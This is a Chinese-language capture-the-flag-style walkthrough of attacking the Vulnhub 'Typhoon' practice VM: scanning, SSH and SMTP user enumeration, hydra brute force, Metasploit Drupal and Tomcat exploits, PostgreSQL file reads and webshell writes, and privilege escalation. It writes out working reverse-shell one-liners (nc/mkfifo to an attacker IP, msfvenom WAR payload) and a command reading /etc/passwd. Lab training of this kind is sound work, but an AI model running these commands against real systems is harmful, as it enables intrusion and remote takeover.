kali渗透综合靶机(九)--Typhoon靶机
kali渗透综合靶机(九)--Typhoon靶机
靶机下载地址:https://www.vulnhub.com/entry/typhoon-102,267/
一、主机发现
1.netdiscover -i eth0 -r 192.168.10.0/24,进过分析,确定192.168.10.162是目标靶机
二、端口扫描
1. masscan --rate=10000 -p0-65535 192.168.10.162
三、端口服务识别
1. nmap -sV -T4 -O -p 110,139,631,21,46818,56669,143,53,5432,60954,8080,27017,22,25,3306,445,54180,995,6379,111,2049,37214,80,993 192.168.10.162
或nmap -sV -p- -A 192.168.10.162
四、漏洞查找与利用
21端口(ftp)
nmap扫描可以匿名访问
浏览器访问,发现什么都没有
22端口(ssh)
发现ssh的版本是OpenSSH 6.6.1p1,存在用户名枚举漏洞,使用msf中的ssh枚举脚本(auxiliary/scanner/ssh/ssh_enumusers)
使用cewl收集页面可能是用户的信息,并添加几个常用的用户名,制作一个用户名字典
使用枚举用户脚本枚举用户
python 40136.py 192.168.10.162 -U user.txt
枚举出来用户名为vulnerablevm,www,admin,root,admin123
使用hydra破解密码
hydra -l admin -P /root/rockyou.txt ssh://192.168.10.162 -t 6,下图成功破解admin账户的密码metallica
尝试用admin账户ssh登录目标,登录成功
开始提权,提权方式与下面的提权方式一样
25端口(smtp)
发现开放25端口,版本为Postfix smtpd
使用smtp-user-enum 枚举用户名
smtp-user-enum -M VRFY -U user.txt -t 192.168.10.162,枚举出用户名admin
53端口(DNS ISC BIND9.9.5-3)
查看是否存在漏洞,发现dns版本存在拒绝服务漏洞
80端口(http Apache httpd 2.4.7)
1.扫描网站后台目录
1.1发现http://192.168.10.162/cms,尝试弱口令,失败
1.2漏洞库查找是否有对应的漏洞
1.3在kali中打开msfconsole,并使用了以下exp
1.4成功获得shell
1.5然后就是提权,提权方式有配置不当提权和内核提权
Drupal cms
2.1发现192.168.10.162/drupal/
2.2漏洞库查找是否有对应的漏洞
2.3在kali中打开msfconsole,并使用了以下exp
2.4设置参数
2.5开始攻击,成功获得shell
2.6接下开便是提权了,提权方式和之前的一样
1.3发现http://192.168.10.162/mongoadmin/
1.3.1发现是mondo的web管理页面,点击change database,出现如下
1.3.2点击creds,发现账户密码
1.3.3尝试用ssh登录,成功登陆
1.3.4查看系统版本以及内核版本
1.3.5在kali查看是否有对应的漏洞
1.3.6下载、编译、提权
1.3.7利用sudo提权,前提是已经获得当前普通用户的密码,并且当前用户属于sudo组,下图成功获得管理员权限
445端口
发现目标开放了445端口,使用enum4linux枚举目标共享信息
发现允许空账户、空密码登录,共享文件typhoon
远程挂载
mount -t cifs -o username='',password='' //192.168.10.162/typhoon /mnt
8080(http Apache Tomcat/Coyote JSP engine 1.1)
发现开放了8080,浏览器访问http://192.168.10.162:8080
dirb扫描http://192.168.10.162:8080
发现http://192.168.10.162:8080/manager/,提示需要输入密码
使用msf auxiliary/scanner/http/tomcat_mgr_login 破解tomcat用户名密码
成功获得tomcat用户名密码
使用获得的用户名登录,发现tomcat 的版本是Version 7.0.52
使用metasploit的一个模块tomcat_mgr_upload来尝试进行登录,利用成功,获得meterpreter会话
输入shell,发现当前shell不是交互式的shell,重新打开一个交互式的shell
python -c 'import pty;pty.spawn("/bin/bash")'
开始提权
1.1查看内核版本以及系统版本
1.2利用系统版本的漏洞,进行本地提权
2.利用配置不当进行提权
2.2 我们需要使用Msfvenom创建一个bash代码
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.10.151 lport=9999 R
2.3之后将上面生成的恶意代码在目标靶机系统中添加到script.sh文件
echo "mkfifo /tmp/ruoljay; nc 192.168.10.151 9999 0</tmp/ ruoljay | /bin/sh >/tmp/ ruoljay 2>&1; rm /tmp/ ruoljay " > script.sh
2.4在攻击端开启监听,目标端执行脚本,下图可以看到直接获得管理员权限
3.1用低权限用户将构造的命令写入script.sh,令文件调用以root身份运行的/bin/sh,然后反弹shell,就可以获得root权限了
Echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.151 8888 >/tmp/f;”>script.sh
3.2在kali攻击端监听,获得管理员权限
Tomcat的后台管理获取shell
http://192.168.10.162:8080/manager/html
1.msfvenom来生WAR文件
msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.10.151 lport=5555 -f war -o evil.war
2.使用7z l evil.war 查看evulll.war具体内容
3.上传evil.war文件
4.攻击端监听,浏览器访问上传的恶意Web应用程序
http://192.168.10.162:8080/evil/wjsdgaavcuyf.jsp
5.这次攻击端获得反弹shell
6.接下来便是提权,方式和之前的一样。
5432(PostgreSQL)
1.使用auxiliary/scanner/postgres/postgres_login,尝试爆破PostgreSQL数据库用户名密码
2.成功爆破出来PostgreSQL用户名以及密码
3.登录数据库
psql -h 192.168.10.162 -U postgres
4.列下目录
5. 读取权限允许的文件
select pg_read_file('postgresql.conf',0,1000);
6.建表,并使用copy从文件写入数据到表
DROP TABLE if EXISTS MrLee;CREATE TABLE MrLee(t TEXT);COPY MrLee FROM '/etc/passwd';select * from MrLee limit 1 offset 0;
成功读取到了/etc/passwd第一行
7.直接读出所有数据
SELECT * FROM MrLee;
8.利用数据库写文件
INSERT INTO MrLee(t) VALUES('hello,MrLee');
COPY MrLee(t) TO '/tmp/MrLee';
SELECT * FROM MrLee;
显示里面有一句hello,MrLee,成功写入文件,并成功读取到源内容
9.写入木马
9.1创建OID,清空内容
SELECT lo_create(9999);
delete from pg_largeobject where loid=9999;
//创建OID,清空内容
9.2接下来就是写入木马了,使用hex
insert into pg_largeobject (loid,pageno,data) values(9999, 0, decode('.....', 'hex'));
10.菜刀连接
11.接下来就是提权了
总结:
1.信息收集、目录扫描、漏洞分析与利用
2.getshell方法
1.ssh爆破
2.lotus cms漏洞利用
3.Drupal cms漏洞利用
4.mongoadmin 数据库管理web页面查看用户名、密码
5.tomcat tomcat_mgr_upload漏洞
6.PostgreSQL未授权访问
3.提权方法
1.sudo提权
2.内核版本提权
3.利用配置不当进行提权
